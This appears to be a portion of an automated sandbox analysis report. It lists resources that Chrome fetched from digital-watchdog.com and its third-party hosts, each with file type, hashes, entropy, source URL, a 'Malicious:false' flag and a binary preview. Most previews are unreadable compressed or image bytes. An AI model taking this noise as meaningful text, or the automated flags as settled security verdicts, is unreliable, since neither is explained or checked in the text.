                                                                                                                                                                                    Preview:..`5`....m..[.ut:.,.p..SDFH2...R..?_......v...xH..}..K c.^.d!......Q.....7_+,..R.y.d.....}..C..)..kxu"..D..u..l<.(>.x).i....3..{........~EK...!Lh..(....b..v>}J..M.W.....rQ....]...=.4.{.A..I.Q.9........+d....#...=[o.E.C...6$....ls...o.5...[..." .6..on.3.m.{...eX..h...*8...F.lJ......o.....B..|...AM...s.KNf....NPo.N8..5$..T..b.ZwW..F..p...s.(...=....9.....fF;.G.1b...g.9t.4..N*..?........*Hv...<....,k.yr....W..9./.F.WX'.N/}...3l..Q...,.h..J........l?...6...X.....d...K._.j...5x..ih....5..Rn.........[...z1td...Iu...7.E..........*Z[UO{..*.(Vc......=...^y\..k....`..S..X8,.......O$....3.%..S....h.._.*.~jX...cdr0...).4..F_.>...?........d...O..J.V.....Q...6.....%,(....M|. %A..gw....`....8.d...<.......W...4.x..|6{.}.U...1.C8.#.I......!.S..y[..4E._....V.oc...sBE)..R.(.~.8..;..{l.e.HBw-0..2-..v.h........e.g..0h.~...a.(aEO!..h.G........!.\.U.]?....~.:.....z.8..........f;D.Km.y)...>....].F.T>......H.......v..]...y.<.*..XR.....8tkr..en."...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 26053
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2213
                                                                                                                                                                                    Entropy (8bit):7.804229893511201
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:9047C8F0C67107E5437BB4A8E8DE35D9
                                                                                                                                                                                    SHA1:EB7C94EFA3FC45C3F877C9B1740EBA69589E9BD7
                                                                                                                                                                                    SHA-256:AABADA9EF08893D9363F8D18B78930789C9057D7C2D4CE7A23D24C7B93C25A72
                                                                                                                                                                                    SHA-512:C75C2E5BEFCBAEDB6296CBD2A15C05CECB00D40940F77FBA347E32D71707CF6450E8560A4EB71C870815904375E1BAE45B02EBB1C59C74308E01A1BB289AB11D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://unpkg.com/aos@2.3.4/dist/aos.css
                                                                                                                                                                                    Preview:.................n.H..o%.T).0....R.>.[%..I.6.].w.F{.+H./{.......2....jx...7}3k.........u.w...".p.\,.w..G....u..t..F'Ev...=[{....yKh...I....7...[h...vgFv.)/.4.Sq....w...b.9.4.....D.=|...S.(..M4..."T0D...-.H.dT!F.LT.j,F.cT9F...dT!F.eT.j,F.cT9F.`47..!Fs0.<.h....c4...@MFs...e4.3..b4...9Fs.Qg2. F....3.b1.0F..#.5.u...e..u..u...c...........?....}..?.S.2..K.....q.....e..-.H.....`.>...........d.C.z.Q.f..b.c.z.QO0Z.....%.h.f...h.1Zr..D.&.%.h.2Z..-c1Zb....%.he2ZA.V`.U..*....h.1Z....V....h.f...h.1Zq.V....h.1Z...aF.X....5.hM.j2ZC..(.u..:..5.h.1Z..3....@..C|.)~....s|&V.9~f?...R%..G...,?..0?...g...~>g7!. .$.v..S<.'N=..&.`.....O...j..d.qPbK(Q.YTC..$....D...*...b..:J..%...FJ.d.qRbK).1fQ-%...hbJ@3%9.l..k3.c..zJ.?%.....Jr.Y.Q.-..a..J.O%.D...J..c...u......WI4a%...G2.8+.......K?.[?.^.A.....x..c.......B..F..,..X.1fQ.%..h"K@.%.d.3...z.YXg..$....h.'.e...RKJ.YTk..$....lII2[2.........oI4.%..d.q\bK..0fQ.%..h.K@.%..l..k3[a..K..%....K*.Y.y.-...E....K../...$.5...l.1../1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 700 x 700, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):258900
                                                                                                                                                                                    Entropy (8bit):7.984655577714003
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:38FBCF545C2D9EA8E021E9D049BD7A42
                                                                                                                                                                                    SHA1:84F495CF71E3CB6093E4C4A71BAD7B7AA9044BF6
                                                                                                                                                                                    SHA-256:DABBA4403FA41CCD722289C586A5FA69FA5D5923ECCEBE3450921285489AB03F
                                                                                                                                                                                    SHA-512:FD7EF44AEB1330D86E428DEBA120561C7A223D7FD4087253C1F06F1B154D406DDEFC22D8C40D92535380C4DCDEBD09FCDF581D7B45BDCCAF74C7D40DACD3D72E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR.....................gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=16, height=4000, bps=206, PhotometricIntepretation=RGB, description=BANGKOK THAILAND - NOVEMBER 04: A general view of the stadium during the FIFA Futsal World Cup match between Paraguay and Costa, orientation=upper-left, width=6000], baseline, precision 8, 5121x2158, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1128644
                                                                                                                                                                                    Entropy (8bit):7.794264699406204
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:21E6AD9191C528E57F89F3E02C9088B3
                                                                                                                                                                                    SHA1:DD2B743FB23565D7A7CB77EFBC45AA223070AD08
                                                                                                                                                                                    SHA-256:E38CB18F8B8B01D7204F2F0D697C9268D7726949DD71E2008936D9B7775554E9
                                                                                                                                                                                    SHA-512:912EFCFFB1B3A5C16FED40780E8F0BC8D0D799476658B5A620ED6060A01E919D973455391CECAA5993F8E3B44B10994E433AE386BD4FD8E6B4B7CD0E4391F9D3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/img/banner/DW-MEGApix-Ai_Banner.jpg
                                                                                                                                                                                    Preview:......Exif..II*...............p...................................................................................................(...........1...=.......2...............................................i.....................BANGKOK THAILAND - NOVEMBER 04: A general view of the stadium during the FIFA Futsal World Cup match between Paraguay and Costa Rica at Indoor Stadium Huamark on November 4, 2012 in BANGKOK,Thailand...-..'....-..'..Adobe Photoshop 25.12 (20240724.m.2711 c586246) (Macintosh).2024:07:29 09:14:10.B.A.N.G.K.O.K. .T.H.A.I.L.A.N.D. .-. .N.O.V.E.M.B.E.R. .0.4.:. .A. .g.e.n.e.r.a.l. .v.i.e.w. .o.f. .t.h.e. .s.t.a.d.i.u.m. .d.u.r.i.n.g. .t.h.e. .F.I.F.A. .F.u.t.s.a.l. .W.o.r.l.d. .C.u.p. .m.a.t.c.h. .b.e.t.w.e.e.n. .P.a.r.a.g.u.a.y. .a.n.d. .C.o.s.t.a. .R.i.c.a. .a.t. .I.n.d.o.o.r. .S.t.a.d.i.u.m. .H.u.a.m.a.r.k. .o.n. .N.o.v.e.m.b.e.r. .4.,. .2.0.1.2. .i.n. .B.A.N.G.K.O.K.,.T.h.a.i.l.a.n.d...s.t.a.d.i.u.m.;. .c.o.m.p.e.t.i.t.i.o.n.;. .m.o.t.i.o.n.;. .a.c.t.i.o.n.;. .a.c.t.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 883 x 676, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):250559
                                                                                                                                                                                    Entropy (8bit):7.9906554689937535
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:D5A6F5BC1392B903C223AA6D883C3A69
                                                                                                                                                                                    SHA1:60B78C6BE8CDDABD6A667FEEDCE77484D78024A9
                                                                                                                                                                                    SHA-256:82AAFEEEFC4CB4C7300A6F8E4F265A2A1300120C7659D57450DAFFD81944172F
                                                                                                                                                                                    SHA-512:E672F8BC39E2A97A23C7445AC744156398E87DEE869231E1F64E3E35E8CB71DDB5773C290D63AE4F3A9F5A6490890762334A53A199BB522978FBA015A5B6EA8E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR...s...........fY....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 136
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):140
                                                                                                                                                                                    Entropy (8bit):6.484256141774989
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AA7BBD11619F9504B6383D100DDB80DC
                                                                                                                                                                                    SHA1:887F93F62E4C116F36D5C4750EA6559FBE9E6746
                                                                                                                                                                                    SHA-256:467014FF9FC80EB0B4ABFF9126B62B31E2CE4B00C16ED565841F9F986C6E2303
                                                                                                                                                                                    SHA-512:1591C83914692A7C46C44185342FF2BEE28B682E3A3AE7440B9F8031D9D6F4BC812BF2B95AFECFB954371B045615105776BC90936B0B3FD042C5D860D04C9199
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://kanshuwang.top/ls/index.php?akFFGw9O
                                                                                                                                                                                    Preview:..........=.M.. .@.}O..v..Jb$.. #..R .......K..=.1`..]..]....W#'.b.|2..j.+y..^.;d....U.Re".......Yy.y..xPz......P+fw.1..&....=....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 653660
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):277777
                                                                                                                                                                                    Entropy (8bit):7.997498870793456
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:1BCB97B1285721105553309EF9CFC6EF
                                                                                                                                                                                    SHA1:5386604184A7E367832938681578BDB368321521
                                                                                                                                                                                    SHA-256:EAF30D514459DDC10218D52805D9A3E80434C6A315272D54A9A2099B3C7294DB
                                                                                                                                                                                    SHA-512:64176CEBF2B8022527B426E3A3896C1C8DED86C7440CB96E5177ACDE2F94B6094C7D9D3E3328E40A19CCCBE8E69329ECF9F739953D54508211A0BBAB87804C78
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.gstatic.com/recaptcha/releases/jt8Oh2-Ue1u7nEbJQUIdocyd/recaptcha__en.js
                                                                                                                                                                                    Preview:............iw...(......T.6jM..`%6...;.....,..M,.G..;...w......~...jV.{...:...eL._.98(.-.....mZ.x.....j.....S2M.Ko...2Y..%....2X.x.T..A....A.*....n.......z.M.0.....M..........`p.?..Q...^z..T:.._..t...a../.*}.VA.5.....2<.(G.=._.I...1..u.{y.."H ....!...&d...2i...........Y8].....6.>L.].m.PU2.6h.5U..>..!Io.+.(X.J...*IY.<..s...g.>.A.)$...T..Y....T........X..CUMJ...u#/.[_..y.`R^.1GU.yJ....kG.%.U...v.T....j.).*..A..RR|......0.J(<..^o._Sv..Oz........>..PHd....G.h....<.-.p!J.F....p.......{.Cv9$=....8.....6...X.W?^..A....jJ..h$a...-...Y....i+/..|.K1..jo.....s.>q ...T[{.Ol......g.>.y.=..}.C....m.{...L...4.Y}....L..',.'L...6..,...j9..m.|(..d..z...,y...4|.....!..<.[.....W..,..2..j.2.{.....t:V..?...O.UU...0.o.[...U....O.....(.u.~..%...S..y#..3|.4i..t.Z\.!..1...e.^i...i<.....?.c..JZ`C.f^.'V......_......hT)....3|.P.}....*(-..g.......C.....1q.<...I:.....Bi..SB&JC.x.,.K!cL.[......1....|}7...AH!....`zW.>?....TL..Fb.Y.>...2.2-.'.1KU......|.....\y.Q........SN
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 857 x 746, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):100286
                                                                                                                                                                                    Entropy (8bit):7.989622309387193
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:E851EA382E28F3B74615FCE69C7402F0
                                                                                                                                                                                    SHA1:558B885324E59FFFEDE7F723567F94650276DFE6
                                                                                                                                                                                    SHA-256:E2E4AA4AF46EA4E22DB2835C87F5F58E2A8175CA841CCB2C852192CFBD8193EB
                                                                                                                                                                                    SHA-512:2B689756FDEE1B4AB0D00CAE21B4579A2AD667DC98F7289494877FAACE09A55FF9C4A0A66BA444629DD4759D9AA5293DC9EA47881CB10CC62AA53AEEE4AEC695
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR...Y..........(.\....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="xmp.did:7ac01088-8101-1442-abb5-0d2a2dd62f51" xmpMM:DocumentID="xmp.did:2CA6F9FA11A211F0BA73C3DBD8EC993E" xmpMM:InstanceID="xmp.iid:2CA6F9F911A211F0BA73C3DBD8EC993E" xmp:CreatorTool="Adobe Illustrator 29.4 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="uuid:a2244f13-9498-419c-b9e8-5122033df2c2" stRef:documentID="xmp.did:7ef90bbe-b12f-894a-8fac-ea613f2f9465"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">DW SOC2
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 281676
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):70858
                                                                                                                                                                                    Entropy (8bit):7.995728768292073
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:841CC5D05A489FAD3E37F03529197A3C
                                                                                                                                                                                    SHA1:6710A701E7CD00FF2919229EFB3D5EF22E440822
                                                                                                                                                                                    SHA-256:8F40A10B9A7DB1D09D2508F09D0809469CDC7D50D368E19C9599430B1227CF6D
                                                                                                                                                                                    SHA-512:FE5FB381C3BAB12089491B42646D58A629F79B6B95924CEADA9BF016BE19DEA07E964275F0DE6A634065BA5AC2AFD45F97120D6ACD0A19122E7B9475CC04DE3C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                    Preview:...........{{.H./..|..CK...|.Q.......c;.3..%... .I.q..g....J*.a.t.{...O.J.._...6.../?....C..GqIw.R.V.{5.Y....N... .#...TK..Y....?3...(._..DCV......aH...%Z......g.....}...{.e....t.?...........4....%'.>..$p...)Q.-.^...=.Y).yQ)...=T...(...+9..JAX.=....A.N..(./?B>'.}..^...xT.G.t.....sX....;Qi...=..%.!....V...C.xD...l..Ei....tLch.)=.3lR)....|_.R4.o...Xd.........<...Rw..Sss.e..8..0..dS.`.9...j..*q.....sX)...d.q.3.. .....`,.....=:.M....*..l.l6...w........v.s]....G.}R.Z..FJ?wn.]|.)...j....tqZj....S........j__.....c.....>!...............M..s.>).\`...N...{.:~.:.i.u.:7."....y.../?.N/.J..e..s..uU..puyq....OJ............M..9/._...h.........w.W........}wSzwqv.....Kg...Y.Wv....Y..NZ.[o..W...w.+.&Z..6$A..K..R...sq..9.8..j......M....6)..:.0,.W..I......t.i..m^..zvn.....u;m.I.u.9.{.mP3W...._....g.F^.[Z.zPm..&&.C6f4b.l8a~\.JZ.S{...).].......FVW.......&h=QJ?.2.(..!....`.%..._......Sb.....g......z..............O.A.}a.uL...).a/Q.a.J.....I....z9W..E.Q..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):20
                                                                                                                                                                                    Entropy (8bit):3.4841837197791885
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:CD80BDF0978C636C32481660AB0B9BBE
                                                                                                                                                                                    SHA1:3CD5EC7EB23DE62CCF28141B0F6BCE24F1B196E1
                                                                                                                                                                                    SHA-256:A84CDD70294620060FB218968DD9D5F6F996C1A30DEE2D4360AF0213A4D0797D
                                                                                                                                                                                    SHA-512:808891810C504121D1F9069AD6C471AD2E0AEDDCD8C3D4FBB4B50009F360191892A6B3E26E1FAA84CF910470146AE2D971E286F9731D976C987988A8388FCFC2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://secure.enterpriseforesight247.com/js/267707.js
                                                                                                                                                                                    Preview:...// /js/267707.js.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 73x74, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5368
                                                                                                                                                                                    Entropy (8bit):7.755258895659504
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:3AAAA8EC9E252EADFBC801578004F04A
                                                                                                                                                                                    SHA1:FB8F42AC7E7DCC7CB0592E6538D2421E6AEB2069
                                                                                                                                                                                    SHA-256:A75ABEFE806E00BF11A9C9A499C29CB40759513DD7F5FE3004B69BED769A6818
                                                                                                                                                                                    SHA-512:6C77A6D53EFDF9A1A5716F80F17B1426D910E394E1154A3D26D7B89F0F38B21ACCF60095AD7258838E48BF9A958C46A6EED94FAEC1966FD021146C61CF5914DB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:9E3E5C9A8C81DB118734DB58FDDE4BA7" xmpMM:DocumentID="xmp.did:7365E326477211ECB8BDB3060B8AFEEC" xmpMM:InstanceID="xmp.iid:7365E325477211ECB8BDB3060B8AFEEC" xmp:CreatorTool="Adobe Illustrator 24.3 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0e7e163f-387d-5640-8525-967c941de0a4" stRef:documentID="adobe:docid:photoshop:4426e061-dcdc-aa44-9118-671f329bebaa"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">DW_HomePage_JC</r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (419), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):102961
                                                                                                                                                                                    Entropy (8bit):4.880616207760426
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:E25CCD3546534ADBE356B86A6A8FFE60
                                                                                                                                                                                    SHA1:CC625B996C14988B58E2DC31F8CA9283BACE4452
                                                                                                                                                                                    SHA-256:A044636A83D918060D6331BF57C91BF3777D6402C8124E573B76C1D23317F975
                                                                                                                                                                                    SHA-512:EB4B4022D1EE9E28A49FCBC5F26167EAD487D101D94AFA9CEEB499FF2198DC4EA9775CADAF0CD074804205DC9C090D9BDFF13E4ECDCD50BFFB8AA1B0B6BF1AA8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/css/style.css?20250530073516
                                                                                                                                                                                    Preview:@import 'framework.css';..../* .. Table of contents:.. 1. Common styles.. 2. Common responsive styles.. 3. Headers.. 4. Navigations.. 5. Contents.. 6. Testimonials.. 7. Features.. 8. Forms.. 9. Call to Actions.. 10. Teams.. 11. Pricing Tables.. 12. Contacts.. 13. Showcases.. 14. Footers.. 15. Ecommerce.. 16. Pagination.. */....../* 1. Common styles */....../*..@font-face {.. font-family: 'Italian Plate No2 Expanded';.. src: url('../fonts/ItalianPlateNo2Expanded-Light.eot');.. src: url('../fonts/ItalianPlateNo2Expanded-Light.eot?#iefix') format('embedded-opentype'), url('../fonts/ItalianPlateNo2Expanded-Light.woff2') format('woff2'), url('../fonts/ItalianPlateNo2Expanded-Light.woff') format('woff'), url('../fonts/ItalianPlateNo2Expanded-Light.ttf') format('truetype'), url('../fonts/ItalianPlateNo2Expanded-Light.svg#ItalianPlateNo2Expanded-Light') format('svg');.. font-weight: 300;.. font-style: normal;.. font-display: swap;..}....@font-face {.. font-family: 'Italian
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 74256, version 329.-17761
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):74256
                                                                                                                                                                                    Entropy (8bit):7.996875020662388
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:418DAD87601F9C8ABD0E5798C0DC1FEB
                                                                                                                                                                                    SHA1:A6B003EF506E92D05CDE73ADF67487D7FD7EC6DF
                                                                                                                                                                                    SHA-256:F18C486A80175CF02FEE0E05C2B4ACD86C04CDBAECEC61C1EF91F920509B5EFE
                                                                                                                                                                                    SHA-512:99B9741F2A1C1D50E011C934C2445B07D9460F320EE60132B87D6594E9D91DBF3436849AE4745E29C58AD77846DA5AC3F3C5BEED8389CF8A8177C1E47F1AA8F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://use.fontawesome.com/releases/v5.8.1/webfonts/fa-solid-900.woff2
                                                                                                                                                                                    Preview:wOF2......"........H..!..I......................?FFTM....`........D..;.6.$..,..0.. ..%..m[&A....._...Ve....-:.....'..m.j...x..zm.....oJ.2....$...Q[....n.Q.../.:..To&.a..C....f.|1;#...1..(i!k....../4...Zk......z...`0B)..t&2"2".!"....W..LF..FD&...>l6e.^P.o...O.P............e..*...~.\.y...".$xrK;..........$6.i..f.+.$*Q.JT.....=.!.@}Y+nu5O.9.o<.szI...Tl.:G..x$...>M.K/O6...Typuw....4.q\0.F.i...n.4.>.....>.n......16.V/...{..K...{=w....09@.....11....h...z..Ye6.o.Up...+.[E3.....E.b~...y....a.*...Q.]|Y...g..0...Mh...lhK.K...N.....W...Fk..,81...Z..<.q&.j3..-A.....9$B...w)...A`.....Ad.....m......Vj.l.=.....d...z....{).V..;.%`})9...B`.N.O.O..W9....3....N.9.oB.t,...1....i./J...x...,..i.T.U...w..9.f5..l.....F..X.JL.n.....I.}Y...1.h............I..0.....X.p..'...yE.R...:..K..v...r..).h.x"s.f.......@.X..p.z.9.{....Z...Cly.3...ese..b"..A.....>.}K..!.r...@.P.......x...?..{.=..4..1i...h.lk."......d.{i..I ..?.3.4{6rI.[.ZX.R.`....+..(..r.....!.^.x.>../.K.*]..j...@`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 567 x 567, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):17469
                                                                                                                                                                                    Entropy (8bit):7.911400201960668
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:10AE333D2E7ACF95F11E5C16ADCBB5BD
                                                                                                                                                                                    SHA1:776EA5DBA79F543D533046425D8A1FCD63890155
                                                                                                                                                                                    SHA-256:73C48C3A00881A383B1D2EED22E6CA21E4C10C676D102FEED2E16C78D8EAFC69
                                                                                                                                                                                    SHA-512:D0600DED6997732FB726672A451AACD1F1C7C4A6D7881244D8DAD88DB99B5808A08A5CF2FC4D1DD504FF198783B59F2F232FE8FDC8247A6C758385CDE6A2630C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR...7...7.....g(z.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:BE75BF214E8411EDA3C588EE09F49F97" xmpMM:DocumentID="xmp.did:BE75BF224E8411EDA3C588EE09F49F97"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BE75BF1F4E8411EDA3C588EE09F49F97" stRef:documentID="xmp.did:BE75BF204E8411EDA3C588EE09F49F97"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...*..@.IDATx...M.UU...MQ..b=....S=.....=.h.Af...qrM:....5..;O..1..........I<5..#...D....EJDA(..}...8Uu..Z.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 52916
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):20994
                                                                                                                                                                                    Entropy (8bit):7.988999761676114
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:87E8230A9CA3F0C5CCFA56F70276E2F2
                                                                                                                                                                                    SHA1:EB116C8FD20CB2F85B7A942C7DAE3B0ED6D27FE7
                                                                                                                                                                                    SHA-256:E18D7214E7D3D47D913C0436F5308B9296CA3C6CD34059BF9CBF03126BAFAFE9
                                                                                                                                                                                    SHA-512:37690A81A9E48B157298080746AA94289A4C721C762B826329E70B41BA475BB0261D048F9AB8E7301E43305C5EBF53246C20DA8CD001130BF156E8B3BD38B9B8
